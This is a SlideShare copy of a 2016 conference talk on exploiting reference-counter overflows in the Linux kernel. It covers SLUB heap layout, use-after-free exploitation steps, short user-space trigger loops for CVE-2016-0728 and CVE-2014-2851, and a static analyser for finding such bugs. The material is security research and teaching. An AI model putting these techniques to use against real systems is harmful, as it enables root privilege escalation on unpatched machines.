SlideShare a Scribd company logo
Exploiting COF Vulnerabilities in
the Linux kernel
Vitaly Nikolenko
@vnik5287
44con - 2016
Who am I?
‱ Security researcher
‱ Exploit dev / bug hunting / reverse engineering
‱ Twitter: @vnik5287
Agenda
1. Counter overïŹ‚ows in the kernel
‱ Exploitation techniques
‱ Real case studies
‱ Corner cases and challenges
2. COF static code analyser
Introduction
‱ All trivial bugs are ïŹxed (mostly)
‱ Fuzzing (dumb, smart, guided by code coverage)
‱ kmemcheck
‱ Detects use-after-free accesses and uninitialised-memory-reads
‱ SLUB_DEBUG / DEBUG_SLAB
‱ Enables redzones and poisoning (writing magic values to check
later)
‱ Can detect some out-of-bounds and use-after-free accesses
Introduction
‱ DEBUG_PAGEALLOC
‱ Unmaps freed pages from address space
‱ Can detect some use-after-free accesses
‱ KASan
‱ Fast and comprehensive solution for both UAF and OOB
‱ Detects out-of-bounds for both writes and reads
‱ KTSan
‱ Fast data-race and deadlock detector
Introduction
‱ Counter overïŹ‚ows are not easily detectable
‱ Would require triggering the vulnerable path
2^32 times before UAF
‱ Existing bug detection techniques are not very
useful
Counter overïŹ‚ows
‱ The purpose of the OS is to allow (concurrent)
consumers
‱ These consumers have a demand for (shared)
resources that the OS needs to manage
‱ The kernel needs to keep reference counters for
shared resources, e.g., ïŹle descriptors, sockets,
process speciïŹc structs, etc.
Counter overïŹ‚ows
‱ Counter overïŹ‚ows - special case of integer
overïŹ‚ows and UAF
‱ There’s a vulnerable kernel path (reachable from
user space) where
‱ counter increments > counter decrements
(counter overïŹ‚ow)
‱ counter increments < counter decrements
(counter underïŹ‚ow)
File refcounting
struct ïŹle
type = struct file {
union {
struct llist_node fu_llist;
struct callback_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode;
const struct file_operations *f_op;
spinlock_t f_lock;
atomic_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;
...
}
File refcounting
syscall(open, 
)
struct file *get_empty_filp(void)
{
const struct cred *cred = current_cred();
static long old_max;
struct file *f;
int error;
f = kmem_cache_zalloc(filp_cachep, GFP_KERNEL);
if (unlikely(!f))
return ERR_PTR(-ENOMEM);
percpu_counter_inc(&nr_files);
f->f_cred = get_cred(cred);
error = security_file_alloc(f);
if (unlikely(error)) {
file_free(f);
return ERR_PTR(error);
}
INIT_LIST_HEAD(&f->f_u.fu_list);
atomic_set(&f->f_count, 1);
...
File refcounting
Sharing the fd
static inline struct file *
get_file(struct file *f)
{
atomic_inc(&f->f_count);
return f;
}
File refcounting
Closing fd/exiting the process
void fput(struct file *file)
{
if (atomic_dec_and_test(&file->f_count)) {
struct task_struct *task = current;
file_sb_list_del(file);
...
if (llist_add(&file->f_u.fu_llist,
&delayed_fput_list))
schedule_delayed_work(&delayed_fput_work,
1);
}
}
‱ Atomic API implemented by the kernel:
‱ atomic_set - set atomic variable
‱ atomic_inc - increment atomic variable
‱ atomic_dec - decrement atomic variable
‱ atomic_dec_and_test — decrement and test
‱ atomic_inc_and_test — increment and test
‱ etc
File refcounting
Atomic integers
File refcounting
Atomic integers
(gdb) ptype atomic_t
type = struct {
int counter;
}
Counter overïŹ‚ows
‱ Data models:
‱ x86 - ILP32
‱ x86_64 - LP64
‱ Signed integer 0 to 0xffffffff
‱ OverïŹ‚owing 4 bytes is quick right?
#include <stdio.h>
int main() {
unsigned int count;
for (count = 0; count < 0xffffffff; count++)
;
return 0;
}
test:~ vnik$ time ./t
real 0m8.293s
user 0m8.267s
sys 0m0.015s
Counter overïŹ‚ows
i7-4870HQ CPU @ 2.50GHz - user space
struct test {
atomic_t count;
struct rcu_head rcu;
};
static void increment() {
atomic_inc(&testp->count);
}
static long device_ioctl(struct file *file, unsigned int cmd,
unsigned long args) {
switch(cmd) {
case IOCTL_SET: /* set counter value */
atomic_set(&testp->count, args);
break;
case IOCTL_INCREMENT:
increment();
break;
...
}
Counter overïŹ‚ows
i7-4870HQ CPU @ 2.50GHz - kernel space
int main() {
int fd;
fd = open(DEVICE_PATH, O_RDONLY);
if (fd == -1)
return -1;
ioctl(fd, IOCTL_SET, 0);
unsigned count;
for (count = 0; count < 0xffffffff; count++)
ioctl(fd, IOCTL_INCREMENT, 0);
}
vnik@ubuntu:~/$ time ./trigger1
real58m48.772s
user1m17.369s
sys 32m49.483s
Counter overïŹ‚ows
i7-4870HQ CPU @ 2.50GHz - kernel space
‱ At least 30-60 min to overïŹ‚ow (approximately)
‱ Not very practical in certain exploitation
scenarios (mobile root?)
Counter overïŹ‚ows
OverïŹ‚owing kernel integers
Counter overïŹ‚ows
void * some_kernel_function() {
...
struct file *f = fget(fd);
...
if (some_error_condition)
goto out;
...
if (atomic_dec_and_test(&f—>f_count)) {
call_rcu(...); // fput(f)
out:
return -EINVAL;
}
VMM
‱ Kernel implements a virtual memory abstraction
layer
‱ Using physical memory allocations is inefïŹcient
(fragmentation, increased swapping)
‱ Basic unit of memory is a page (>= 4KB)
‱ Kernel allocates memory internally for a large
variety of objects
‱ Pages are divided into smaller ïŹxed chunks (power of 2)
aka slabs
‱ Pages containing objects of the same size are grouped
into caches
‱ SLAB allocator is the original slab allocator on
implementation in OpenSolaris
‱ SLAB (in caps) - speciïŹc slab allocator implementation
‱ slab - generic term
VMM
Terminology
VMM
Linux SLUB allocator
‱ Starting from 2.6 branch, the slab allocator can
be selected at compile time (SLAB, SLUB, SLOB,
SLQB)
‱ SLUB is the default slab allocator on Linux
‱ All allocators perform the same function (and are
mutually exclusive) but there’re signiïŹcant
differences in exploitation
‱ General-purpose allocations (kmalloc/kzalloc) are
for objects of size 8, 16, 32, 64, 128, 
, 8192 bytes
‱ Objects that are not power of 2 are rounded up to the
next closest slab size
‱ Special-purpose allocations (kmem_cache_alloc)
are for frequently-used objects
‱ Objects of the ~same size are grouped into the same
cache
VMM
Linux SLUB allocator
‱ No metadata in slabs
‱ Instead, each slab page (struct page) has
SLUB metadata (freelist ptr, etc)
‱ Free objects have a pointer (at offset=0) to the
next free object in the slab (i.e., linked list)
‱ The last free object in the slab has its next pointer
set to NUL
VMM
Linux SLUB allocator
Free
object
Free
object
Free
object
Allocated
object
Allocated
object
SLUB page {
freelist*
index=0;
inuse=2;
objects=5;


NULL
VMM
Linux SLUB allocator
Counter overïŹ‚ows
Exploitation procedure
1. OverïŹ‚ow the counter by calling the vulnerable path A() until the
counter —> 0
2. Find path B() that triggers kfree() if counter == 0
3. Start allocating target objects to ïŹll partial slabs of the same size
C()
4. Use the old object reference to
1. Modify the target object, or
2. Execute the (overwritten) function ptr in the vulnerable object
5. Trigger the overwritten function ptr in the target object
Counter overïŹ‚ows
Step 4 - option #1
// assume sizeof(struct A)
== sizeof(struct B)
struct A {‹
atomic_t counter;
int some_var;
...
};
struct B {‹
void (∗func)();
...
};
// Old kernel path
...
a->some_var = 0;
...
Counter overïŹ‚ows
Step 4 - option #2
// assume sizeof(struct A) ==
sizeof(struct B)
struct A {‹
atomic_t counter;
void (*func)();
...
};
struct B {‹
int dummy;
long user_controlled_var;
...
};
// Old kernel path
...
a->func(...);
...
‱ Find the target object B, s.t.,
1. B has user-controlled variables
2. The user-controlled variable is aligned with the
function pointer in the vulnerable object A
Counter overïŹ‚ows
Step 4 - option #2
Vulnerable object A Target object B
void (*func)(); user-controlled data
.
.
.
.
.
.
.
.
.
.
.
.
struct {
long mtype;
char mtext[ARBITRARY_LEN];
} msg;
memset(msg.mtext, 'A', sizeof(msg.mtext));
msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0)
== -1) {
...
Counter overïŹ‚ows
msgsnd() syscall
long do_msgsnd(int msqid, long mtype, void __user *mtext,
size_t msgsz, int msgflg)
{
struct msg_queue *msq;
struct msg_msg *msg;
int err;
struct ipc_namespace *ns;
ns = current->nsproxy->ipc_ns;
if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 ||
msqid < 0)
return -EINVAL;
if (mtype < 1)
return -EINVAL;
msg = load_msg(mtext, msgsz);
...
Counter overïŹ‚ows
msgsnd() syscall
struct msg_msg *load_msg(const void __user *src, size_t
len)
{
struct msg_msg *msg;
struct msg_msgseg *seg;
int err = -EFAULT;
size_t alen;
msg = alloc_msg(len);
if (msg == NULL)
return ERR_PTR(-ENOMEM);
alen = min(len, DATALEN_MSG);
if (copy_from_user(msg + 1, src, alen))
goto out_err;
...
Counter overïŹ‚ows
msgsnd() syscall
RCU
‱ Kernel counter decrements and object freeing
are often implemented via RCU calls
‱ This introduces indeterminism in counter values
‱ If 0-check is done using an RCU callback, can
skip the check and overïŹ‚ow past 0
RCU
‱ Read-Copy Update - synchronisation mechanism
(replacement for read-writer locking)
‱ Available since 2002
‱ Low-overhead readers, immune to deadlocks, readers
can run concurrently with updaters, etc.
‱ rcu_read_lock()/rcu_read_unlock(),
rcu_assign_pointer(), rcu_dereference(), etc.
‱ Kernel API in ./Documentation/RCU/rcu.txt
RCU
void call_rcu(struct rcu_head *head,
void (*callback) (void *head));
‱ This call invokes a callback function callback()
after all the CPUs have gone through at least one
quiescent state.
‱ “For performance reasons, good implementations
of RCU do not wait for completion of the quiescent
cycle. Instead, they queue the cycle in batches
and return.”
‱ The CPU performs a process switch
‱ The CPU starts executing in user mode
‱ The CPU executes the idle loop
RCU
Quiescent state
static void callback_fn() {
atomic_dec(&testp->count);
}
static void testfn() {
atomic_inc(&testp->count);
call_rcu(&testp->rcu, callback_fn);
}
static long device_ioctl(struct file *file, unsigned
cmd, unsigned long args) {
switch(cmd) {
case IOCTL_SET: /* set counter value */
atomic_set(&testp->count, args);
break;
case IOCTL_TEST: /* increment and decrement the count
*/
testfn();
break;
...
RCU
int main() {
int fd, i;
fd = open(DEVICE_PATH, O_RDONLY);
if (fd == -1) {
perror("open");
return -1;
}
ioctl(fd, IOCTL_SET, 0);
for (i=0; i < 100; i++) {
ioctl(fd, IOCTL_TEST, NULL);
}
RCU
User-space trigger
(gdb) b testfn
Breakpoint 17 at 0xffffffffa02250c0: file /home/vnik/rcu/rcu.c, line
64.
(gdb) commands
Type commands for breakpoint(s) 17, one per line.
>silent
>p testp->count
>c
>end
(gdb) c
Continuing.
$150 = {counter = 0}
$151 = {counter = 1}
$152 = {counter = 2}
$153 = {counter = 2}
$154 = {counter = 3}
$155 = {counter = 3}
$156 = {counter = 4}
$157 = {counter = 4}
$158 = {counter = 2}
$159 = {counter = 2}
$160 = {counter = 3}
...
RCU
RCU calls
int main() {
int fd, i;
fd = open(DEVICE_PATH, O_RDONLY);
if (fd == -1) {
perror("open");
return -1;
}
ioctl(fd, IOCTL_SET, 0);
for (i=0; i < 100; i++) {
ioctl(fd, IOCTL_TEST, NULL);
sleep(1); // let the CPU go through a quiescent
state
}
RCU
User-space trigger
(gdb) b testfn
Breakpoint 18 at 0xffffffffa02250c0: file /home/vnik/rcu/rcu.c, line 64.
(gdb) commands
Type commands for breakpoint(s) 18, one per line.
>silent
>p testp->count
>c
>end
(gdb) c
Continuing.
$191 = {counter = 0}
$192 = {counter = 0}
$193 = {counter = 0}
$194 = {counter = 0}
$195 = {counter = 0}
$196 = {counter = 0}
$197 = {counter = 0}
$198 = {counter = 0}
$199 = {counter = 0}
$200 = {counter = 0}
$201 = {counter = 0}
$202 = {counter = 0}
$203 = {counter = 0}
...
RCU
Synchronised RCU calls
Counter overïŹ‚ows
Test cases
‱ CVE-2014-2851 - group_info counter
overïŹ‚ow (exploit published Jan 2016)
‱ CVE-2016-0728 - keyring counter
overïŹ‚ow (write up published 3 weeks later)
CVE-2016-0728
‱ “This vulnerability has implications for
approximately tens of millions of Linux PCs and
servers, and 66 percent of all Android devices
(phones/tablets).” - Perception Point
‱ Google said company researchers don't believe
any Android devices are vulnerable to exploits by
third-party applications. It also said researchers
believe that the number of Android devices
affected is "signiïŹcantly smaller than initially
reported."
CVE-2016-0728
‱ Reference leak in the keyrings facility
‱ System call interface – keyctl syscall is provided so
that userspace programs can use the facility for their
own purposes.
‱ Each process can create a keyring for the current
session using
keyctl(KEYCTL_JOIN_SESSION_KEYRING, name)
‱ The keyring object can be shared between processes
by referencing the same keyring name.
CVE-2016-0728
User-space trigger
for (i = 0; i < 0xfffffffd; i++) {
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING,
"mykeyring");
if (serial < 0) {
perror("keyctl");
return -1;
}
}
CVE-2016-0728
long join_session_keyring(const char *name)
{
...
new = prepare_creds(); // increment the counter
keyring = find_keyring_by_name(name, false);
if (PTR_ERR(keyring) == -ENOKEY) {
...
} else if (IS_ERR(keyring)) {
ret = PTR_ERR(keyring);
goto error2;
} else if (keyring == new->session_keyring) {
ret = 0;
goto error2;
}
...
key_put(keyring);
okay:
return ret;
error2:
mutex_unlock(&key_session_mutex);
error:
abort_creds(new); // decrement the counter via RCU
return ret;
}
CVE-2016-0728
struct key
struct key {
atomic_t usage; /* number of references */
key_serial_t serial; /* key serial number */
...
union {
struct keyring_index_key index_key;
struct {
struct key_type *type; /* type of key */
char *description;
};
};
...
CVE-2016-0728
Vulnerable object
‱ keyring object is of type struct key
‱ The object size is 184 bytes —> kmalloc-192 cache
‱ type ptr points to key_type struct containing function
pointers:
struct key_type {
...
int (*vet_description)(const char *description);
int (*preparse)(struct key_preparsed_payload *prep);
void (*free_preparse)(struct key_preparsed_payload *prep);
int (*instantiate)(struct key *key, struct key_preparsed_payload *prep);
int (*update)(struct key *key, struct key_preparsed_payload *prep);
int (*match_preparse)(struct key_match_data *match_data);
void (*match_free)(struct key_match_data *match_data);
void (*revoke)(struct key *key);
...
CVE-2016-0728
Exploitation
1. OverïŹ‚ow the keyring reference counter and
trigger kfree()
‱ Increment to 0xffffffff - eps, then eps
ordered steps with sleep(1)
2. Allocate the target object replacing the
vulnerable object (option 2)
3. Trigger the overwritten function ptr in keyring,
e.g., type->revoke()
CVE-2016-0728
Exploitation
128 < x <= 192
bytes
struct key_type *type;
0xdeadbeef
Target object X
void (*revoke)(
);
struct key_type
at 0xdeadbeef
User space
Kernel space
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
CVE-2014-2851
‱ Counter overïŹ‚ow in ping_init_sock()
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
‱ The vulnerable path can be reached by non-
privileged users
CVE-2014-2851
Vulnerable path
int ping_init_sock(struct sock *sk)
{
struct net *net = sock_net(sk);
kgid_t group = current_egid();
struct group_info *group_info = get_current_groups();
int i, j, count = group_info->ngroups;
kgid_t low, high;
inet_get_ping_group_range_net(net, &low, &high);
if (gid_lte(low, group) && gid_lte(group, high))
return 0;
...
CVE-2014-2851
struct group_info
‱ sizeof(struct group_info) = 140 bytes (kmalloc-192)
type = struct group_info {
atomic_t usage;
int ngroups;
int nblocks;
kgid_t small_block[32];
kgid_t *blocks[];
}
CVE-2014-2851
Challenges
‱ group_info is a frequently used object
‱ Does not contain any function pointers
‱ Cannot modify any object values (except for
incrementing the refcounter)
‱ Race window between group_info free and
target object allocation is very small
‱ Other processes use the old reference
CVE-2014-2851
Challenges
Free
object
Free
object
Free
object
Freed
object
Allocated
object
SLUB page {
freelist*
index=0;
inuse=1;
objects=5;


NULL
*freeptr
CVE-2014-2851
Exploitation - slab metadata overwrite
1. Increment the group_info usage counter close to
0xffffffff by creating ICMP sockets
2. Increment the usage counter by 1 and try to free
group_info via faccessat() && repeat
3. Keep incrementing the group_info usage counter
until it points to some user-space memory address
4. Map this region in user space and memset it to 0
5. Start allocating structure X in kernel space that has the
size 128-192 bytes
6. The SLUB allocator will allocate this structure X at our
user-space address
CVE-2014-2851
Exploitation - slab metadata overwrite
Free
object
Free
object
Free
object
Freed
object
Allocated
object
SLUB page {
freelist*
index=0;
inuse=1;
objects=5;


NULL
*freeptr
struct
file
User space
COF Static Code Analyser
COF Analyser
Algorithm
Step 1: CFG with inlined function invocations
Step 2: CFG —> NFA
Step 3: NFA —> DFA
Step 4: DFA —> RE
‱ CFG for the entire kernel, then focus on user-space
reachable code only (syscalls, ioctls, socket
operations, etc.)
‱ LLVM for the kernel - http://llvm.linuxfoundation.org
‱ GCC Link Time Optimisation (LTO) - “gives GCC the
capability of dumping its internal representation (GIMPLE)
to disk, so that all the different compilation units that make
up a single executable can be optimised as a single
module.” - https://gcc.gnu.org/wiki/LinkTimeOptimization
COF Analyser
CFG
‱ GCC performs optimisation work in “passes” that form trees
‱ Custom pass called directly after the GCC “cfg” pass
‱ CFG for every function in the kernel, followed by manual
function inlining
COF Analyser
CFG
BB func1:
func2();
BB2 func1:
...
BB1 func1
BB2 func1:
...
BB1 func2:
...
BBn func2:
...
CFG func2
[Block main 1]
[Block main 0]
[Block main 2]
a = 1;
[Block main 3]
[Block main 3.0]
increment (&shared);
[Block main 2.0]
increment (&shared);
[Block main 5]
<L2>:
return D.2309;
[Block main 4]
D.2309 = 0;
[Block main 2.1]
decrement (&shared);
if (a == 0)
struct shared_struct shared;
int main(int argc, char **argv) {
int a = 0;
increment(&shared);
decrement(&shared);
if (!a)
increment(&shared);
return 0;
}
COF Analyser
CFG
‱ Each basic block represents a state in the NFA
‱ Basic blocks containing the counter increment/
decrement functions are split into two states
‱ The edge (transition) between these two states
is labeled with V (increment) or P (decrement)
‱ All other transitions are labeled with epsilon
COF Analyser
CFG -> NFA
a = 1;
increment();
b = 1;
if ( 
 )
S1
S2
S2
V
eps
start
end
start = end
COF Analyser
CFG -> NFA
0 1
eps
2
eps
3
V
4
eps
5
P
6eps
9
eps
7eps
8
V
eps
10
eps
11
eps
0 1
eps
2
eps
3
V
4
eps
5
P
6
eps
7
eps 8
eps
9
V
10
eps 11eps
eps
NFA
DFA
COF Analyser
NFA -> DFA
‱ Convert the obtained DFA to a regular expression
‱ Change semantics of the language operations
(language composition, union, closure, etc.)
‱ The outcome is the oracle algorithm: yes or no
answer
‱ Can then reconstruct the original path from NFA
COF Analyser
DFA -> RE
‱ Eliminating false-positives
‱ “Points-to” analysis some_struct->func_ptr()
‱ Rewriting automata manipulation algorithms
COF Analyser
Challenges and improvements
static ssize_t do_sendfile(int out_fd, int in_fd, loff_t
*ppos, size_t count, loff_t max)
{
struct fd in, out;
...
in = fdget(in_fd);
if (!in.file)
goto out;
if (!(in.file->f_mode & FMODE_READ))
goto fput_in;
fput_out:
fdput(out);
fput_in:
fdput(in);
out:
return retval;
}
COF Analyser
sendïŹle syscall
Questions?

More Related Content

PDF
Process Address Space: The way to create virtual address (page table) of user...
PDF
malloc & vmalloc in Linux
PDF
How to use KASAN to debug memory corruption in OpenStack environment- (2)
PPTX
Linux Network Stack
PPTX
Linux MMAP & Ioremap introduction
PPTX
Slab Allocator in Linux Kernel
PDF
Linux Networking Explained
PPTX
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
Process Address Space: The way to create virtual address (page table) of user...
malloc & vmalloc in Linux
How to use KASAN to debug memory corruption in OpenStack environment- (2)
Linux Network Stack
Linux MMAP & Ioremap introduction
Slab Allocator in Linux Kernel
Linux Networking Explained
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...

What's hot (20)

PDF
Decompressed vmlinux: linux kernel initialization from page table configurati...
PPTX
Linux kernel debugging
PDF
spinlock.pdf
PDF
eBPF Perf Tools 2019
PDF
Monitoring MySQL with DTrace/SystemTap
PDF
Linux Kernel - Virtual File System
PPTX
Linux Kernel Booting Process (2) - For NLKB
PPT
Bootstrap process of u boot (NDS32 RISC CPU)
PDF
LLVM Register Allocation
PDF
Understanding Open vSwitch
PDF
Linux dma engine
PDF
I/Oä»źæƒłćŒ–æœ€ć‰ç·šă€œăƒăƒƒăƒˆăƒŻăƒŒă‚ŻI/Oă‚’äž­ćżƒă«ă€œ
PDF
ACPI Debugging from Linux Kernel
PPTX
Understanding DPDK
ODP
Dpdk performance
PDF
Intel DPDK Step by Step instructions
PDF
Physical Memory Management.pdf
PDF
Building Network Functions with eBPF & BCC
PDF
Performance Analysis Tools for Linux Kernel
PDF
Valgrind tutorial
Decompressed vmlinux: linux kernel initialization from page table configurati...
Linux kernel debugging
spinlock.pdf
eBPF Perf Tools 2019
Monitoring MySQL with DTrace/SystemTap
Linux Kernel - Virtual File System
Linux Kernel Booting Process (2) - For NLKB
Bootstrap process of u boot (NDS32 RISC CPU)
LLVM Register Allocation
Understanding Open vSwitch
Linux dma engine
I/Oä»źæƒłćŒ–æœ€ć‰ç·šă€œăƒăƒƒăƒˆăƒŻăƒŒă‚ŻI/Oă‚’äž­ćżƒă«ă€œ
ACPI Debugging from Linux Kernel
Understanding DPDK
Dpdk performance
Intel DPDK Step by Step instructions
Physical Memory Management.pdf
Building Network Functions with eBPF & BCC
Performance Analysis Tools for Linux Kernel
Valgrind tutorial
Ad

Similar to Exploitation of counter overflows in the Linux kernel (20)

PDF
Auditing the Opensource Kernels
PDF
Vmreport
PPTX
Back to the CORE
PDF
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
PDF
CONFidence 2015: when something overflowing... - Peter Hlavaty
PDF
When is something overflowing
PDF
AllBits presentation - Lower Level SW Security
PDF
Davide Berardi - Linux hardening and security measures against Memory corruption
PPTX
grsecurity and PaX
PPTX
Bypassing ASLR Exploiting CVE 2015-7545
PDF
The Linux Kernel Implementation of Pipes and FIFOs
PPTX
Computer Science Homework Help
PPT
Linux memory
PPTX
Putting a Fork in Fork (Linux Process and Memory Management)
PPTX
operating system
PDF
lwref: insane idea on reference counting
PDF
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
PPT
[CCC-28c3] Post Memory Corruption Memory Analysis
PPTX
Operating System Assignment Help
PPT
Updates
Auditing the Opensource Kernels
Vmreport
Back to the CORE
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CONFidence 2015: when something overflowing... - Peter Hlavaty
When is something overflowing
AllBits presentation - Lower Level SW Security
Davide Berardi - Linux hardening and security measures against Memory corruption
grsecurity and PaX
Bypassing ASLR Exploiting CVE 2015-7545
The Linux Kernel Implementation of Pipes and FIFOs
Computer Science Homework Help
Linux memory
Putting a Fork in Fork (Linux Process and Memory Management)
operating system
lwref: insane idea on reference counting
CONFidence 2017: Escaping the (sand)box: The promises and pitfalls of modern ...
[CCC-28c3] Post Memory Corruption Memory Analysis
Operating System Assignment Help
Updates
Ad

Recently uploaded (20)

PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
PPTX
ai tools demonstartion for schools and inter college
PPTX
Introduction to Artificial Intelligence
PPTX
L1 - Introduction to python Backend.pptx
PPTX
CHAPTER 2 - PM Management and IT Context
PDF
Softaken Excel to vCard Converter Software.pdf
PPTX
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
PDF
medical staffing services at VALiNTRY
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
PDF
Design an Analysis of Algorithms I-SECS-1021-03
PDF
wealthsignaloriginal-com-DS-text-... (1).pdf
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
PDF
Nekopoi APK 2025 free lastest update
PPTX
VVF-Customer-Presentation2025-Ver1.9.pptx
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
PDF
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
PPTX
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
PDF
System and Network Administration Chapter 2
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
ai tools demonstartion for schools and inter college
Introduction to Artificial Intelligence
L1 - Introduction to python Backend.pptx
CHAPTER 2 - PM Management and IT Context
Softaken Excel to vCard Converter Software.pdf
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
medical staffing services at VALiNTRY
2025 Textile ERP Trends: SAP, Odoo & Oracle
Design an Analysis of Algorithms I-SECS-1021-03
wealthsignaloriginal-com-DS-text-... (1).pdf
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
How to Choose the Right IT Partner for Your Business in Malaysia
Nekopoi APK 2025 free lastest update
VVF-Customer-Presentation2025-Ver1.9.pptx
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
Wondershare Filmora 15 Crack With Activation Key [2025
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
System and Network Administration Chapter 2

Exploitation of counter overflows in the Linux kernel

  • 1. Exploiting COF Vulnerabilities in the Linux kernel Vitaly Nikolenko @vnik5287 44con - 2016
  • 2. Who am I? ‱ Security researcher ‱ Exploit dev / bug hunting / reverse engineering ‱ Twitter: @vnik5287
  • 3. Agenda 1. Counter overïŹ‚ows in the kernel ‱ Exploitation techniques ‱ Real case studies ‱ Corner cases and challenges 2. COF static code analyser
  • 4. Introduction ‱ All trivial bugs are ïŹxed (mostly) ‱ Fuzzing (dumb, smart, guided by code coverage) ‱ kmemcheck ‱ Detects use-after-free accesses and uninitialised-memory-reads ‱ SLUB_DEBUG / DEBUG_SLAB ‱ Enables redzones and poisoning (writing magic values to check later) ‱ Can detect some out-of-bounds and use-after-free accesses
  • 5. Introduction ‱ DEBUG_PAGEALLOC ‱ Unmaps freed pages from address space ‱ Can detect some use-after-free accesses ‱ KASan ‱ Fast and comprehensive solution for both UAF and OOB ‱ Detects out-of-bounds for both writes and reads ‱ KTSan ‱ Fast data-race and deadlock detector
  • 6. Introduction ‱ Counter overïŹ‚ows are not easily detectable ‱ Would require triggering the vulnerable path 2^32 times before UAF ‱ Existing bug detection techniques are not very useful
  • 7. Counter overïŹ‚ows ‱ The purpose of the OS is to allow (concurrent) consumers ‱ These consumers have a demand for (shared) resources that the OS needs to manage ‱ The kernel needs to keep reference counters for shared resources, e.g., ïŹle descriptors, sockets, process speciïŹc structs, etc.
  • 8. Counter overïŹ‚ows ‱ Counter overïŹ‚ows - special case of integer overïŹ‚ows and UAF ‱ There’s a vulnerable kernel path (reachable from user space) where ‱ counter increments > counter decrements (counter overïŹ‚ow) ‱ counter increments < counter decrements (counter underïŹ‚ow)
  • 9. File refcounting struct ïŹle type = struct file { union { struct llist_node fu_llist; struct callback_head fu_rcuhead; } f_u; struct path f_path; struct inode *f_inode; const struct file_operations *f_op; spinlock_t f_lock; atomic_t f_count; unsigned int f_flags; fmode_t f_mode; struct mutex f_pos_lock; loff_t f_pos; struct fown_struct f_owner; const struct cred *f_cred; struct file_ra_state f_ra; ... }
  • 10. File refcounting syscall(open, 
) struct file *get_empty_filp(void) { const struct cred *cred = current_cred(); static long old_max; struct file *f; int error; f = kmem_cache_zalloc(filp_cachep, GFP_KERNEL); if (unlikely(!f)) return ERR_PTR(-ENOMEM); percpu_counter_inc(&nr_files); f->f_cred = get_cred(cred); error = security_file_alloc(f); if (unlikely(error)) { file_free(f); return ERR_PTR(error); } INIT_LIST_HEAD(&f->f_u.fu_list); atomic_set(&f->f_count, 1); ...
  • 11. File refcounting Sharing the fd static inline struct file * get_file(struct file *f) { atomic_inc(&f->f_count); return f; }
  • 12. File refcounting Closing fd/exiting the process void fput(struct file *file) { if (atomic_dec_and_test(&file->f_count)) { struct task_struct *task = current; file_sb_list_del(file); ... if (llist_add(&file->f_u.fu_llist, &delayed_fput_list)) schedule_delayed_work(&delayed_fput_work, 1); } }
  • 13. ‱ Atomic API implemented by the kernel: ‱ atomic_set - set atomic variable ‱ atomic_inc - increment atomic variable ‱ atomic_dec - decrement atomic variable ‱ atomic_dec_and_test — decrement and test ‱ atomic_inc_and_test — increment and test ‱ etc File refcounting Atomic integers
  • 14. File refcounting Atomic integers (gdb) ptype atomic_t type = struct { int counter; }
  • 15. Counter overïŹ‚ows ‱ Data models: ‱ x86 - ILP32 ‱ x86_64 - LP64 ‱ Signed integer 0 to 0xffffffff ‱ OverïŹ‚owing 4 bytes is quick right?
  • 16. #include <stdio.h> int main() { unsigned int count; for (count = 0; count < 0xffffffff; count++) ; return 0; } test:~ vnik$ time ./t real 0m8.293s user 0m8.267s sys 0m0.015s Counter overïŹ‚ows i7-4870HQ CPU @ 2.50GHz - user space
  • 17. struct test { atomic_t count; struct rcu_head rcu; }; static void increment() { atomic_inc(&testp->count); } static long device_ioctl(struct file *file, unsigned int cmd, unsigned long args) { switch(cmd) { case IOCTL_SET: /* set counter value */ atomic_set(&testp->count, args); break; case IOCTL_INCREMENT: increment(); break; ... } Counter overïŹ‚ows i7-4870HQ CPU @ 2.50GHz - kernel space
  • 18. int main() { int fd; fd = open(DEVICE_PATH, O_RDONLY); if (fd == -1) return -1; ioctl(fd, IOCTL_SET, 0); unsigned count; for (count = 0; count < 0xffffffff; count++) ioctl(fd, IOCTL_INCREMENT, 0); } vnik@ubuntu:~/$ time ./trigger1 real58m48.772s user1m17.369s sys 32m49.483s Counter overïŹ‚ows i7-4870HQ CPU @ 2.50GHz - kernel space
  • 19. ‱ At least 30-60 min to overïŹ‚ow (approximately) ‱ Not very practical in certain exploitation scenarios (mobile root?) Counter overïŹ‚ows OverïŹ‚owing kernel integers
  • 20. Counter overïŹ‚ows void * some_kernel_function() { ... struct file *f = fget(fd); ... if (some_error_condition) goto out; ... if (atomic_dec_and_test(&f—>f_count)) { call_rcu(...); // fput(f) out: return -EINVAL; }
  • 21. VMM ‱ Kernel implements a virtual memory abstraction layer ‱ Using physical memory allocations is inefïŹcient (fragmentation, increased swapping) ‱ Basic unit of memory is a page (>= 4KB) ‱ Kernel allocates memory internally for a large variety of objects
